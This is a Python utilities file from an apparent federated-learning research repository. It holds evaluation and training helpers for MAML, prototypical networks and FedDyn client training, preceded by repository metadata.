| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
fcdfa7f3e1502005c313f265b98e40d4e28daf58
| 45,386
|
py
|
Python
|
utils_general.py
|
venkatesh-saligrama/Personalized-Federated-Learning
|
0ba79295d7c2e93bc9e2a37a6912bf005c4be698
|
[
"MIT"
] | 12
|
2021-07-23T07:50:19.000Z
|
2022-02-17T18:25:01.000Z
|
utils_general.py
|
venkatesh-saligrama/Personalized-Federated-Learning
|
0ba79295d7c2e93bc9e2a37a6912bf005c4be698
|
[
"MIT"
] | null | null | null |
utils_general.py
|
venkatesh-saligrama/Personalized-Federated-Learning
|
0ba79295d7c2e93bc9e2a37a6912bf005c4be698
|
[
"MIT"
] | 3
|
2021-07-12T03:57:55.000Z
|
2021-09-19T11:11:57.000Z
|
from utils_libs import *
from utils_dataset import *
from utils_models import *
# Global parameters
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
max_norm = 10
num_workers = 0
# --- Helper methods
weight = 0.8
def smooth_filter(arr, weight=0.8):
    """Exponentially smooth a sequence of values (e.g. a metric curve).

    Args:
        arr: sequence of numeric values.
        weight: smoothing factor in [0, 1]; higher means smoother. Default
            0.8 matches the module-level ``weight`` constant this helper
            previously read implicitly — exposed as a parameter so callers
            can vary it without mutating a global.

    Returns:
        list of smoothed values, same length as ``arr``; returns [] for an
        empty input (the original indexed ``arr[0]`` and crashed).
    """
    if len(arr) == 0:
        return []
    smoothed = []
    last = arr[0]  # seed with the first point so smoothed[0] == arr[0]
    for point in arr:
        last = last * weight + (1 - weight) * point
        smoothed.append(last)
    return smoothed
# Check if the model has NaN values
def is_model_NaN(model):
    """Return True if any named parameter of ``model`` contains a NaN."""
    return any(
        torch.isnan(p.data).any().item()
        for _, p in model.named_parameters()
    )
def get_mdl_params(model_list, n_par=0):
    """Flatten each model's parameters into one row of a float32 tensor.

    Args:
        model_list: list of torch modules with identical parameter layouts.
        n_par: total parameter count per model; 0 means "infer it from the
            first model in the list".

    Returns:
        tensor of shape (len(model_list), n_par) on the module-level
        ``device``, one flattened parameter vector per row.
    """
    if n_par == 0:
        # Infer the flattened size from the first model.
        n_par = sum(p.data.reshape(-1).shape[0]
                    for _, p in model_list[0].named_parameters())
    param_mat = torch.zeros((len(model_list), n_par),
                            dtype=torch.float32, device=device)
    for row, mdl in enumerate(model_list):
        offset = 0
        for _, p in mdl.named_parameters():
            flat = p.data.detach().reshape(-1)
            param_mat[row, offset:offset + len(flat)] = flat
            offset += len(flat)
    return param_mat
# --- Evaluate a NN model
def get_acc_loss(data_x, data_y, model, dataset_name, w_decay = 0):
    """Evaluate ``model`` on one dataset.

    Args:
        data_x: input samples; anything with ``.shape[0]`` = sample count
            that the project-level ``Dataset`` wrapper accepts.
        data_y: class labels aligned with ``data_x`` (cast to long for the
            cross-entropy loss below).
        model: torch module; switched to eval mode here and restored to
            train mode before returning.
        dataset_name: forwarded to the project-level ``Dataset`` wrapper.
        w_decay: if non-zero, adds (w_decay/2) * ||params||^2 to the loss so
            the reported value matches an L2-regularized training objective.

    Returns:
        (mean cross-entropy loss per sample, accuracy in [0, 1]).
    """
    acc_overall = 0; loss_overall = 0;
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    # Cap the batch size so large evaluation sets are processed in chunks.
    batch_size = min(3000, data_x.shape[0])
    n_tst = data_x.shape[0]
    tst_load = torch.utils.data.DataLoader(Dataset(data_x, data_y, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=False, num_workers=num_workers)
    model.eval(); model = model.to(device)
    with torch.no_grad():  # inference only — no autograd bookkeeping
        for data in tst_load:
            batch_x, batch_y = data[0].to(device), data[1].to(device)
            y_pred = model(batch_x)
            # Loss calculation (summed over the batch; normalized by n_tst below)
            loss = loss_fn(y_pred, batch_y.reshape(-1).long())
            loss_overall += loss.item()
            # Accuracy calculation: argmax over class logits vs. labels
            y_pred = y_pred.cpu().numpy()
            y_pred = np.argmax(y_pred, axis=1).reshape(-1)
            batch_y = batch_y.cpu().numpy().reshape(-1).astype(np.int32)
            batch_correct = np.sum(y_pred == batch_y)
            acc_overall += batch_correct
        loss_overall /= n_tst
        if w_decay != 0:
            # Add L2 loss
            params = get_mdl_params([model]).cpu().numpy()
            loss_overall += w_decay/2 * np.sum(params * params)
    model.train()  # restore training mode for the caller
    return loss_overall, acc_overall / n_tst
def get_acc_loss_over_clients(data_x, data_y, model, dataset_name, w_decay=0):
    """Evaluate ``model`` on every client's data and aggregate.

    Args:
        data_x: per-client list of input arrays.
        data_y: per-client list of label arrays, aligned with ``data_x``.
        model: torch module, forwarded to ``get_acc_loss``.
        dataset_name: forwarded to ``get_acc_loss``.
        w_decay: forwarded to ``get_acc_loss`` (L2 term on the loss).

    Returns:
        (weighted mean loss, weighted mean accuracy, max client accuracy,
        min client accuracy). Means are weighted by each client's sample
        count.
    """
    n_clnt = len(data_y)
    acc_list = np.zeros(n_clnt)
    loss_ = 0; acc_ = 0; n_total = 0
    for idx in range(n_clnt):
        loss_clnt, acc_clnt = get_acc_loss(data_x[idx], data_y[idx], model, dataset_name, w_decay)
        # BUG FIX: original weighted by len(data_y) — the *client count*, a
        # loop constant that cancels between numerator and denominator —
        # instead of this client's sample count len(data_y[idx]).
        n_i = len(data_y[idx])
        loss_ += loss_clnt * n_i; acc_ += acc_clnt * n_i; n_total += n_i
        acc_list[idx] = acc_clnt
    return loss_ / n_total, acc_ / n_total, np.max(acc_list), np.min(acc_list)
## MAML
def get_maml_acc_loss(data_x, data_y, model, model_func, learning_rate, num_grad_step, dataset_name, tst_x=False, tst_y=False, weight_decay_data=0, weight_decay_tst=False):
    """Fine-tune a copy of ``model`` on (data_x, data_y), then evaluate it.

    MAML-style evaluation: clone the meta-model, take ``num_grad_step``
    full-batch SGD steps on the adaptation data, then score with
    ``get_acc_loss`` — on the adaptation data itself when ``tst_x`` is left
    as the ``False`` sentinel, otherwise on (tst_x, tst_y). The meta-model
    ``model`` is never modified; only its fresh copy is trained.

    Args:
        data_x, data_y: adaptation (support) samples and labels.
        model: meta-model whose parameters seed the copy.
        model_func: zero-arg factory producing a model of the same
            architecture (used to build the throwaway copy).
        learning_rate: SGD step size for fine-tuning.
        num_grad_step: number of full-batch gradient steps.
        dataset_name: forwarded to the project-level ``Dataset`` wrapper.
        tst_x, tst_y: optional evaluation (query) set; ``False`` (bool
            sentinel) means "evaluate on the adaptation data".
        weight_decay_data: SGD weight decay and L2 term for train-side eval.
        weight_decay_tst: L2 term for test-side eval; a bool sentinel falls
            back to ``weight_decay_data``.

    Returns:
        (loss, accuracy) from ``get_acc_loss`` on the chosen split.
    """
    _model = model_func().to(device)
    # Deep-copy the meta parameters so fine-tuning cannot touch ``model``.
    _model.load_state_dict(copy.deepcopy(dict(model.named_parameters())))
    for params in _model.parameters():
        params.requires_grad = True
    optimizer_ = torch.optim.SGD(_model.parameters(), lr=learning_rate, weight_decay=weight_decay_data)
    # Do Fine Tuning on all dataset
    # batch_size=len(data_y): each optimizer step sees the full dataset.
    trn_load = torch.utils.data.DataLoader(Dataset(data_x, data_y, dataset_name=dataset_name),
                                           batch_size=len(data_y), shuffle=False, num_workers=num_workers)
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    _model.train(); _model = _model.to(device)
    for _ in range(num_grad_step):
        for data in trn_load:
            batch_x, batch_y = data[0].to(device), data[1].to(device)
            y_pred = _model(batch_x)
            # Sum loss divided by batch size == mean loss per sample.
            loss = loss_fn(y_pred, batch_y.reshape(-1).long()) / list(batch_y.size())[0]
            optimizer_.zero_grad()
            loss.backward()
            torch.nn.utils.clip_grad_norm_(parameters=_model.parameters(), max_norm=max_norm) # Clip gradients
            optimizer_.step()
    if isinstance(tst_x, bool):
        # Get train acc
        loss_, acc_ = get_acc_loss(data_x, data_y, _model, dataset_name, weight_decay_data)
    else:
        # Get test acc
        weight_decay_tst = weight_decay_data if isinstance(weight_decay_tst, bool) else weight_decay_tst
        loss_, acc_ = get_acc_loss(tst_x, tst_y, _model, dataset_name, weight_decay_tst)
    del _model  # drop the fine-tuned copy promptly (frees GPU memory)
    return loss_, acc_
# Meta update and evaluate, Update based on train and evaluate based on test
def get_maml_acc_loss_over_clients(trn_x, trn_y, tst_x, tst_y, model_func, meta_learning_rate, meta_model, dataset_name, num_grad_step, w_decay=0):
    """Meta-evaluate: adapt on each client's train set, score on its test set.

    For every client, ``get_maml_acc_loss`` fine-tunes a copy of
    ``meta_model`` on (trn_x[i], trn_y[i]) and evaluates it on
    (tst_x[i], tst_y[i]).

    Returns:
        (weighted mean loss, weighted mean accuracy, max client accuracy,
        min client accuracy). Means are weighted by each client's test
        sample count.
    """
    n_clnt = len(trn_x)
    acc_list = np.zeros(n_clnt)
    loss_ = 0; acc_ = 0; n_total = 0
    for idx in range(n_clnt):
        loss_clnt, acc_clnt = get_maml_acc_loss(data_x=trn_x[idx], data_y=trn_y[idx], model=meta_model, model_func=model_func,
                                                learning_rate=meta_learning_rate, num_grad_step=num_grad_step,
                                                dataset_name=dataset_name, tst_x=tst_x[idx], tst_y=tst_y[idx],
                                                weight_decay_data=w_decay)
        # BUG FIX: original weighted by len(tst_y) — the *client count*, a
        # loop constant that cancels out — instead of this client's test
        # sample count len(tst_y[idx]).
        n_i = len(tst_y[idx])
        loss_ += loss_clnt * n_i; acc_ += acc_clnt * n_i; n_total += n_i
        acc_list[idx] = acc_clnt
    return loss_ / n_total, acc_ / n_total, np.max(acc_list), np.min(acc_list)
## Proto
def get_proto_acc_loss(data_x, data_y, model, model_func, dataset_name, tst_x=False, tst_y=False, weight_decay=0):
    """Prototype-based evaluation: embed support and query sets, classify
    queries against class prototypes, and return (loss, accuracy).

    ``model`` is temporarily switched into feature-extractor mode via its
    ``proto`` flag, both splits are embedded in one full batch each, and
    ``get_logits_proto_cen`` turns (support features, support one-hot
    labels, query features) into query logits — presumably via class
    centroids; verify against its definition elsewhere in the project.

    Args:
        data_x, data_y: support samples and integer labels.
        model: torch module exposing a ``proto`` attribute that switches it
            to emit features instead of logits.
        model_func: unused here; kept for signature parity with the other
            ``get_*_acc_loss`` helpers.
        dataset_name: forwarded to the project-level ``Dataset`` wrapper.
        tst_x, tst_y: optional query set; ``False`` (bool sentinel) means
            "query the support set itself".
        weight_decay: unused in this function's body.

    Returns:
        (mean cross-entropy loss over queries, query accuracy in [0, 1]).
    """
    # Get one hot vectors for the labels
    # np.unique(..., return_inverse=True) compacts labels to 0..K-1 indices.
    unique, unique_indices = np.unique(data_y.reshape(-1), return_inverse=True)
    data_y_one_hot = np.zeros((len(data_x), np.max(unique_indices) + 1))
    data_y_one_hot[np.arange(len(data_x)), unique_indices] = 1
    # batch_size=len(data_x): the loader yields exactly one full batch.
    trn_load = torch.utils.data.DataLoader(Dataset(data_x, data_y_one_hot, dataset_name=dataset_name),
                                           batch_size=len(data_x), shuffle=False, num_workers=num_workers)
    model = model.to(device)
    model.proto = True  # switch model to feature-extraction mode
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    if isinstance(tst_x, bool):
        # No query set given: evaluate the support set against itself.
        tst_x = data_x; tst_y_one_hot = data_y_one_hot
    else:
        unique, unique_indices = np.unique(tst_y.reshape(-1), return_inverse=True)
        tst_y_one_hot = np.zeros((len(tst_x), np.max(unique_indices) + 1))
        tst_y_one_hot[np.arange(len(tst_x)), unique_indices] = 1
    tst_load = torch.utils.data.DataLoader(Dataset(tst_x, tst_y_one_hot, dataset_name=dataset_name),
                                           batch_size=len(tst_x), shuffle=False, num_workers=num_workers)
    with torch.no_grad():
        # Single-batch loaders: each loop body runs once, binding the batch.
        for data in trn_load:
            batch_trn_x, batch_trn_y = data[0].to(device), data[1].to(device)
        for data in tst_load:
            batch_tst_x, batch_tst_y = data[0].to(device), data[1].to(device)
        feature_space_sampl = model(batch_trn_x)
        feature_space_query = model(batch_tst_x)
        logits_cen = get_logits_proto_cen(feature_space_sampl, batch_trn_y, feature_space_query)
        # Sum loss divided by query count == mean loss per query sample.
        loss_proto = (loss_fn(logits_cen, torch.argmax(batch_tst_y, 1).reshape(-1).long()) / list(batch_tst_y.size())[0]).item()
        acc = np.mean(np.argmax(logits_cen.cpu().numpy(), axis=1) == np.argmax(batch_tst_y.cpu().numpy(), axis=1))
    model.proto = False  # restore normal (logit-producing) mode
    return loss_proto, acc
# Meta update and evaluate, Update based on train and evaluate based on test
def get_proto_acc_loss_over_clients(trn_x, trn_y, tst_x, tst_y, model_func, meta_model, dataset_name, w_decay = 0):
    """Evaluate the proto model on every client and aggregate.

    For client idx, prototypes come from (trn_x[idx], trn_y[idx]) and
    queries from (tst_x[idx], tst_y[idx]); per-client results are averaged
    weighted by that client's query-set size.

    Returns (weighted mean loss, weighted mean acc, max client acc, min client acc).
    """
    acc_ = 0; loss_ = 0; n_clnt = len(trn_x); n_total = 0
    acc_list = np.zeros(n_clnt)
    for idx in range(n_clnt):
        loss_clnt, acc_clnt = get_proto_acc_loss(data_x=trn_x[idx], data_y=trn_y[idx], model=meta_model, model_func=model_func,
                                                 dataset_name=dataset_name,
                                                 tst_x=tst_x[idx], tst_y=tst_y[idx], weight_decay=w_decay)
        # BUG FIX: weight by this client's test-set size len(tst_y[idx]).
        # The original used len(tst_y) — the number of clients, a constant —
        # which silently reduced the "weighted" average to an unweighted one.
        n_tst_idx = len(tst_y[idx])
        loss_ += loss_clnt*n_tst_idx; acc_ += acc_clnt*n_tst_idx; n_total += n_tst_idx
        acc_list[idx] = acc_clnt
    acc_ = acc_ / n_total; loss_ = loss_ / n_total
    return loss_, acc_, np.max(acc_list), np.min(acc_list)
# --- Helper for the printing and recording performance
def get_all_results_maml(meta_learning_rate, num_grad_step, clnt_x, clnt_y, tst_x, tst_y, dataset_name, model_func, avg_model, all_model, fast_exec, i):
    """Print and collect MAML evaluation for the 'sel' (avg) and 'all' models.

    Rows are [loss, acc, acc_max, acc_min] for: sel/Test, all/Test,
    sel/Cent, all/Cent. Cent (train-data) rows stay zeros when fast_exec.
    """
    print('Meta Lr: %f, Number of Gradient Steps: %d' %(meta_learning_rate, num_grad_step))
    eval_plan = [
        ('sel', 'Test', avg_model, tst_x, tst_y, True),
        ('all', 'Test', all_model, tst_x, tst_y, True),
        ('sel', 'Cent', avg_model, clnt_x, clnt_y, not fast_exec),
        ('all', 'Cent', all_model, clnt_x, clnt_y, not fast_exec),
    ]
    results = []
    for tag, split, mdl, eval_x, eval_y, enabled in eval_plan:
        row = [0, 0, 0, 0]
        if enabled:
            loss_v, acc_v, acc_mx, acc_mn = get_maml_acc_loss_over_clients(clnt_x, clnt_y, eval_x, eval_y, model_func, meta_learning_rate, mdl, dataset_name, num_grad_step)
            print("**** Communication %s %3d, %s Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(tag, i+1, split, acc_v, acc_mx, acc_mn, loss_v))
            row = [loss_v, acc_v, acc_mx, acc_mn]
        results.append(row)
    return results
def get_all_results_plain(clnt_x, clnt_y, tst_x, tst_y, dataset_name, avg_model, all_model, fast_exec, i):
    """Print and collect plain (non-meta) evaluation of the global models.

    Rows are [loss, acc, acc_max, acc_min] for: sel/Test, all/Test,
    sel/Cent, all/Cent. Cent (train-data) rows stay zeros when fast_exec.
    """
    print('No Meta learning only global model')
    eval_plan = [
        ('sel', 'Test', avg_model, tst_x, tst_y, True),
        ('all', 'Test', all_model, tst_x, tst_y, True),
        ('sel', 'Cent', avg_model, clnt_x, clnt_y, not fast_exec),
        ('all', 'Cent', all_model, clnt_x, clnt_y, not fast_exec),
    ]
    results = []
    for tag, split, mdl, eval_x, eval_y, enabled in eval_plan:
        row = [0, 0, 0, 0]
        if enabled:
            loss_v, acc_v, acc_mx, acc_mn = get_acc_loss_over_clients(eval_x, eval_y, mdl, dataset_name, w_decay = 0)
            print("**** Communication %s %3d, %s Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(tag, i+1, split, acc_v, acc_mx, acc_mn, loss_v))
            row = [loss_v, acc_v, acc_mx, acc_mn]
        results.append(row)
    return results
def get_all_results_proto(clnt_x, clnt_y, tst_x, tst_y, dataset_name, model_func, avg_model, all_model, fast_exec, i):
    """Print and collect prototypical-network evaluation of the global models.

    Support sets always come from client train data; the query set is the
    test split for 'Test' rows and the train split for 'Cent' rows.
    Rows are [loss, acc, acc_max, acc_min]; Cent rows stay zeros when fast_exec.
    """
    print('Proto')
    eval_plan = [
        ('sel', 'Test', avg_model, tst_x, tst_y, True),
        ('all', 'Test', all_model, tst_x, tst_y, True),
        ('sel', 'Cent', avg_model, clnt_x, clnt_y, not fast_exec),
        ('all', 'Cent', all_model, clnt_x, clnt_y, not fast_exec),
    ]
    results = []
    for tag, split, mdl, eval_x, eval_y, enabled in eval_plan:
        row = [0, 0, 0, 0]
        if enabled:
            loss_v, acc_v, acc_mx, acc_mn = get_proto_acc_loss_over_clients(clnt_x, clnt_y, eval_x, eval_y, model_func, mdl, dataset_name)
            print("**** Communication %s %3d, %s Accuracy: %.4f, Max: %.3f, Min: %.2f, Loss: %.4f" %(tag, i+1, split, acc_v, acc_mx, acc_mn, loss_v))
            row = [loss_v, acc_v, acc_mx, acc_mn]
        results.append(row)
    return results
# --- Train methods
def train_model(model, trn_x, trn_y, tst_x, tst_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
    """Train `model` with plain SGD for exactly K mini-batch steps.

    Progress is printed every `print_per` steps (0 disables printing);
    test metrics are included only when tst_x is a real array (False skips).
    Returns the model frozen (requires_grad=False) and in eval mode.
    """
    n_trn = trn_x.shape[0]
    trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=True, num_workers=num_workers)
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
    model.train(); model = model.to(device)
    if print_per != 0:
        # tst_x=False (bool) means "no test set" — only report training metrics
        print_test = not isinstance(tst_x, bool)
        loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
        if print_test:
            loss_tst, acc_tst = get_acc_loss(tst_x, tst_y, model, dataset_name, 0)
            print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Test Accuracy: %.4f, Loss: %.4f"
                  %(0, acc_trn, loss_trn, acc_tst, loss_tst))
        else:
            print("Step %3d, Training Accuracy: %.4f, Loss: %.4f" %(0, acc_trn, loss_trn))
        model.train()  # presumably get_acc_loss switches to eval mode — re-enable training
    k=0
    # Count SGD steps (not epochs); the loader is re-iterated until K steps are done
    while(k < K):
        for data in trn_load:
            batch_x, batch_y = data[0].to(device), data[1].to(device)
            y_pred = model(batch_x)
            # Sum-reduced CE divided by batch size == mean CE over the batch
            loss = loss_fn(y_pred, batch_y.reshape(-1).long()) / list(batch_y.size())[0]
            optimizer.zero_grad()
            loss.backward()
            torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
            optimizer.step()
            k += 1
            if print_per != 0 and (k % print_per == 0):
                loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
                if print_test:
                    loss_tst, acc_tst = get_acc_loss(tst_x, tst_y, model, dataset_name, 0)
                    print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Test Accuracy: %.4f, Loss: %.4f"
                          %(k, acc_trn, loss_trn, acc_tst, loss_tst))
                else:
                    print("Step %3d, Training Accuracy: %.4f, Loss: %.4f"
                          %(k,acc_trn,loss_trn))
                model.train()
            if k == K:
                break
    # Freeze model
    for params in model.parameters():
        params.requires_grad = False
    model.eval()
    return model
def get_logits_proto_cen(feature_space_sampl, curr_sampl_y, feature_space_query):
    """Prototypical-network logits: negative squared Euclidean distance from
    each query embedding to each class prototype (mean of support embeddings).

    feature_space_sampl: SxD support embeddings.
    curr_sampl_y:        SxC one-hot support labels.
    feature_space_query: QxD query embeddings.
    Returns a QxC logits tensor.
    """
    assert len(feature_space_sampl) == len(curr_sampl_y), 'Error inconsistent input'
    assert feature_space_sampl.shape[1] == feature_space_query.shape[1], 'Error inconsistent input'
    # Prototypes: per-class sum of support embeddings divided by class counts -> CxD
    class_counts = torch.sum(curr_sampl_y, 0).reshape(-1, 1)
    prototypes = torch.matmul(curr_sampl_y.T, feature_space_sampl).div(class_counts)
    # ||q - p||^2 = ||q||^2 - 2 q·p + ||p||^2, vectorized to QxC
    cross = torch.mm(feature_space_query, prototypes.transpose(0, 1))         # QxC
    query_sq = (feature_space_query ** 2).sum(dim=1, keepdim=True)            # Qx1
    proto_sq = (prototypes ** 2).sum(dim=1, keepdim=True).reshape(1, -1)      # 1xC
    sq_dist = query_sq.expand_as(cross) - 2 * cross + proto_sq.expand_as(cross)
    return -1 * sq_dist
def train_proto_model(model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
    """Train a prototypical network for K steps.

    Each step draws two mini-batches: a support ("sample") batch that defines
    class prototypes and a query batch scored against them. Returns the model
    with model.proto reset to False.
    """
    n_trn = trn_x.shape[0]
    # Get one hot vectors for the labels
    unique, unique_indices = np.unique(trn_y.reshape(-1), return_inverse=True)
    trn_y_one_hot = np.zeros((n_trn, np.max(unique_indices) + 1))
    trn_y_one_hot[np.arange(n_trn), unique_indices] = 1
    trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y_one_hot, train=True, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=True, num_workers=num_workers)
    optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
    model.train(); model = model.to(device); model.proto = True
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    k = 0
    while(k < K):
        # Get two batches of data, one as sample and one as query.
        while True:
            data_list = []
            while len(data_list) != 2:
                for data in trn_load:
                    data_list.append([data[0], data[1]])
                    if len(data_list) == 2:
                        break
            # Every query class should have at least one support sample.
            # NOTE(review): data_list[x][1] is one-hot, so np.unique yields the
            # values {0, 1}, not class ids — this check looks vacuous; confirm.
            sampl_cls = np.unique(data_list[0][1]); query_cls = np.unique(data_list[1][1]); is_violated = False
            for elem in query_cls:
                if not elem in sampl_cls:
                    is_violated = True
            if not is_violated:
                break
        # curr_sampl_y is BS x nCls. A class absent from the support batch would
        # make its prototype NaN, so restrict columns to classes actually present.
        curr_sampl_y = data_list[0][1]; curr_query_y = data_list[1][1]
        non_zero_classes = torch.where(torch.sum(curr_sampl_y, 0).reshape(-1,1) != 0)[0]
        curr_sampl_y = curr_sampl_y[:,non_zero_classes].to(device)
        curr_query_y = curr_query_y[:,non_zero_classes].to(device)
        # Concatenate input so both batches share one forward pass
        curr_sampl_x = data_list[0][0].to(device)
        curr_query_x = data_list[1][0].to(device)
        curr_x = torch.cat((curr_sampl_x, curr_query_x), 0)
        feature_ = model(curr_x)
        feature_space_sampl = feature_[:len(curr_sampl_x)]
        feature_space_query = feature_[len(curr_sampl_x):]
        # Query logits are negative squared distances to the support prototypes
        logits_cen = get_logits_proto_cen(feature_space_sampl, curr_sampl_y, feature_space_query)
        # Mean cross-entropy of the query batch
        loss = loss_fn(logits_cen, torch.argmax(curr_query_y, 1).reshape(-1).long()) / list(curr_query_y.size())[0]
        optimizer.zero_grad()
        loss.backward()
        torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
        ###
        optimizer.step()
        k += 1
        if print_per != 0 and (k % print_per == 0):
            acc = np.mean(np.argmax(logits_cen.detach().cpu().numpy(), axis=1) == np.argmax(curr_query_y.cpu().numpy(), axis=1))
            loss = loss.item()
            print("Step %3d, Batch Acc: %.4f, Loss: %.4f" %(k, acc, loss))
    model.proto = False
    return model
def set_client_from_params(mdl, params):
    """Load a flat parameter vector `params` into model `mdl` in place.

    Slices `params` in the order given by mdl.named_parameters(), reshaping
    each slice to the matching parameter's shape. Returns `mdl`.
    """
    state = copy.deepcopy(dict(mdl.named_parameters()))
    offset = 0
    for name, param in mdl.named_parameters():
        shape = param.data.shape
        numel = param.data.reshape(-1).shape[0]
        state[name].data.copy_(params.data[offset:offset + numel].reshape(shape))
        offset += numel
    mdl.load_state_dict(state)
    return mdl
###
def train_meta_model_MAML(model_func, model, trn_x, trn_y, num_grad_step, meta_learning_rate, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
    """Train `model` with MAML using the `higher` library.

    Each of the K outer steps draws a support batch (adapted for
    `num_grad_step` inner SGD steps at lr=meta_learning_rate) and a query
    batch whose loss updates the meta-parameters at lr=learning_rate.
    Returns the frozen, eval-mode meta-model.
    """
    n_trn = trn_x.shape[0]
    trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=True, num_workers=num_workers)
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    model.train(); model = model.to(device)
    n_par = len(get_mdl_params([model])[0])
    # Outer (meta) optimizer; inner_opt is wrapped by `higher` to be differentiable
    optimizer_ = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
    inner_opt = torch.optim.SGD(model.parameters(), lr=meta_learning_rate, weight_decay=weight_decay)
    if print_per != 0:
        loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
        print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, Higher Library" %(0, acc_trn, loss_trn))
        model.train()
    for k in range(K):
        # Draw two batches: data_list[0] = support set, data_list[1] = query set
        data_list = []
        while len(data_list) != 2:
            for data in trn_load:
                data_list.append([data[0], data[1]])
                if len(data_list) == 2:
                    break
        curr_trn_x, curr_trn_y = data_list[0][0].to(device), data_list[0][1].to(device)
        curr_val_x, curr_val_y = data_list[1][0].to(device), data_list[1][1].to(device)
        # Higher library
        optimizer_.zero_grad()
        # cudnn disabled here — presumably for double-backward support; confirm
        with torch.backends.cudnn.flags(enabled=False):
            with higher.innerloop_ctx(model, inner_opt, copy_initial_weights=False) as (fnet, diffopt):
                # Adapt a functional copy of the model on the support batch;
                # higher keeps differentiable copies of the updated weights.
                for _ in range(num_grad_step):
                    trn_logits = fnet(curr_trn_x)
                    trn_loss = loss_fn(trn_logits, curr_trn_y.reshape(-1).long()) / list(curr_trn_y.size())[0]
                    diffopt.step(trn_loss)
                # Query loss of the adapted parameters drives the meta-update;
                # backward() unrolls through the inner gradient steps.
                val_logits = fnet(curr_val_x)
                val_loss = loss_fn(val_logits, curr_val_y.reshape(-1).long()) / list(curr_val_y.size())[0]
                val_loss.backward()
        torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients
        optimizer_.step()
        if print_per != 0 and ((k+1) % print_per == 0):
            loss_trn, acc_trn = get_maml_acc_loss(trn_x, trn_y, model, model_func, meta_learning_rate, num_grad_step, dataset_name, weight_decay_data=weight_decay)
            print("Step %3d, Training Accuracy: %.4f, Loss: %.4f"
                  %((k+1), acc_trn, loss_trn))
            model.train()
    # Freeze model
    for params in model.parameters():
        params.requires_grad = False
    model.eval()
    return model
### FedDyn methods
####
def train_dyn_model(alpha, lambda_model, server_model, model, trn_x, trn_y, learning_rate, batch_size, K, print_per, weight_decay, dataset_name):
    """Train a client model with the FedDyn objective for K SGD steps.

    lambda_model: flat tensor (presumably the client's FedDyn dual state — confirm).
    server_model: flat tensor of the current server parameters.
    The regularizer added per step is
        -<w, lambda> - alpha*<w, w_server> + (alpha/2)*||w||^2
    over the flattened model weights w. Returns the frozen, eval-mode model.
    """
    n_trn = trn_x.shape[0]
    trn_load = torch.utils.data.DataLoader(Dataset(trn_x, trn_y, train=True, dataset_name=dataset_name),
                                           batch_size=batch_size, shuffle=True, num_workers=num_workers)
    loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
    optimizer = torch.optim.SGD(model.parameters(), lr=learning_rate, weight_decay=weight_decay)
    model.train(); model = model.to(device)
    if print_per != 0:
        loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
        print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, alpha: %.3f" %(0,acc_trn,loss_trn,alpha))
        model.train()
    k=0
    while(k < K):
        for data in trn_load:
            batch_x, batch_y = data[0].to(device), data[1].to(device)
            y_pred = model(batch_x)
            optimizer.zero_grad()
            loss = loss_fn(y_pred, batch_y.reshape(-1).long()) / list(batch_y.size())[0]
            # FedDyn version!
            # Add the dynamic (linear + quadratic) penalty on the flattened weights
            mld_pars = []
            for name, param in model.named_parameters():
                mld_pars.append(param.reshape(-1))
            mld_pars = torch.cat(mld_pars)
            loss_lambda = -torch.sum(mld_pars * lambda_model)
            loss_server = -alpha*torch.sum(mld_pars * server_model) + alpha/2 * torch.sum(mld_pars*mld_pars)
            loss = loss + loss_lambda + loss_server
            loss.backward()
            torch.nn.utils.clip_grad_norm_(parameters=model.parameters(), max_norm=max_norm) # Clip gradients to prevent exploding
            optimizer.step()
            k += 1
            if print_per != 0 and (k % print_per == 0):
                loss_trn, acc_trn = get_acc_loss(trn_x, trn_y, model, dataset_name, weight_decay)
                print("Step %3d, Training Accuracy: %.4f, Loss: %.4f, alpha: %.3f" %(k,acc_trn,loss_trn,alpha))
                model.train()
            if k == K:
                break
    # Freeze model
    for params in model.parameters():
        params.requires_grad = False
    model.eval()
